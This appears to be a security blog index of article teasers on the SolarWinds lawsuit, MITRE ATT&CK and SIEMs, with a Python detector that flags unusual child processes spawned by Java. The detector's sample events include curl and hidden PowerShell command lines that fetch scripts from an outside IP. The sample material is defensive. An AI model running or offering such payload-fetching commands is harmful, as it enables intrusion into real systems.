SolarWinds Data Breach Lawsuit Takeaways for CISOs
What the lawsuit about the SolarWinds attack teaches us about minimum standards of due care.
Why going after MSPs is an increasingly common type of supply chain attack
How standard frameworks like VERIS and MITRE ATT&CK enable a standard language and taxonomy about cyberattacks
Use MITRE ATT&CK to ensure you have detections for the latest adversary techniques employed by APT groups like Deep Panda.
Automation is critical for keeping up with constant change in the threat landscape, and with the exponential growth in the volume of data collected to spot suspicious activity.
A natural curiosity about how things work, such as what the database logs tell you or what a specific cloud permission actually lets you do.
Monitor for suspicious processes spawned by Java. Avoid false positives by investigating logs at least 90 days back and allowlisting the child processes Java is known to spawn in your environment.
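The detection described above, as an added example that is not code from the linked article: a baseline of process-creation events from the last 90 days is turned into an allowlist of child processes Java is known to spawn, and any Java child outside that allowlist raises an alert. The event dictionaries, host names, paths and command lines are constructed sample telemetry (Sysmon EventID 1 / auditd style), not real logs; the field names `parent_image`, `image`, `cmdline`, `host` and `ts` are assumptions for this example.

```python
from datetime import datetime, timedelta

# Parent image basenames that count as "Java" (compared case-insensitively).
JAVA_PARENTS = {"java", "java.exe", "javaw.exe"}


def basename(path: str) -> str:
    """Last path component, tolerant of Windows and POSIX separators, lower-cased."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def is_java_parent(event: dict) -> bool:
    return basename(event["parent_image"]) in JAVA_PARENTS


def build_allowlist(events, now, lookback_days=90):
    """Child-process basenames that Java has spawned within the lookback window.

    Events older than the window are ignored, so the allowlist reflects what the
    environment currently does rather than everything ever seen."""
    cutoff = now - timedelta(days=lookback_days)
    return {basename(e["image"]) for e in events
            if is_java_parent(e) and e["ts"] >= cutoff}


def detect(events, allowlist):
    """Return one alert per Java child process whose basename is not allowlisted."""
    alerts = []
    for e in events:
        if not is_java_parent(e):
            continue  # only children of Java are in scope
        child = basename(e["image"])
        if child in allowlist:
            continue  # seen in the baseline window: suppress to avoid a false positive
        alerts.append({"ts": e["ts"].isoformat(), "host": e["host"],
                       "parent": e["parent_image"], "child": child,
                       "cmdline": e["cmdline"]})
    return alerts


# Fixed "now" so the example is deterministic (assumption for this example).
NOW = datetime(2022, 1, 15)


def _ev(days_ago, host, parent, image, cmdline):
    return {"ts": NOW - timedelta(days=days_ago), "host": host,
            "parent_image": parent, "image": image, "cmdline": cmdline}


# Constructed historical events standing in for ~4 months of process telemetry.
BASELINE_EVENTS = [
    _ev(10, "app01", "/usr/lib/jvm/bin/java", "/bin/sh", "sh -c /opt/app/bin/healthcheck.sh"),
    _ev(60, "app01", "/usr/lib/jvm/bin/java", "/bin/ping", "ping -c 1 db01"),
    _ev(120, "app02", "/usr/lib/jvm/bin/java", "/bin/gzip", "gzip /var/log/app/old.log"),  # older than 90 days
    _ev(5, "web01", "/usr/sbin/nginx", "/bin/sh", "sh -c /usr/sbin/logrotate"),  # not a Java child
]

# Constructed "today" events to run the detection over.
NEW_EVENTS = [
    _ev(0, "app01", "/usr/lib/jvm/bin/java", "/bin/sh", "sh -c /opt/app/bin/healthcheck.sh"),
    _ev(0, "app01", "/usr/lib/jvm/bin/java", "/usr/bin/curl", "curl http://198.51.100.7/x.sh -o /tmp/x.sh"),
    _ev(0, "win01", "C:\\Program Files\\Java\\bin\\java.exe",
        "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
        "powershell -nop -w hidden -c iwr http://198.51.100.7/a.ps1"),
    _ev(0, "app02", "/usr/lib/jvm/bin/java", "/bin/gzip", "gzip /var/log/app/old.log"),
]


def run(lookback_days=90):
    """Build the allowlist from the baseline and return (allowlist, alerts)."""
    allow = build_allowlist(BASELINE_EVENTS, NOW, lookback_days)
    return allow, detect(NEW_EVENTS, allow)


if __name__ == "__main__":
    allow, alerts = run()
    print("allowlisted Java children:", sorted(allow))
    for a in alerts:
        print("ALERT", a)
```

With the 90-day window the allowlist is `sh` and `ping`, so `curl`, `powershell.exe` and `gzip` are flagged; `gzip` is a false positive caused by a baseline that did not reach back far enough, which is why the blurb recommends at least 90 days and why a wider window (`run(lookback_days=180)`) drops it while still flagging the two genuinely suspicious children. Allowlisting by basename is deliberately simple: an attacker can rename a binary, so in production compare hashes or signer information rather than names alone.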
Industrial control systems are juicy targets for nation-state attackers because they typically don’t have the same level of monitoring as corporate IT networks.
High-profile attacks, such as the OPM breach, are typically the result of poor security practices rather than vulnerabilities in office productivity suites.
Often cloud-based for scalability and simplicity, SIEMs are now centralized SecOps hubs for managing security incidents across the entire incident life cycle.
This webinar recommends how to address constant change in the threat landscape and attack surface, plus dynamic business requirements such as cloud transformation.
This attack could be the next big supply chain attack (MITRE ATT&CK T1195.002, Compromise Software Supply Chain), with an impact similar to SolarWinds. Monitor for any suspicious Okta activity.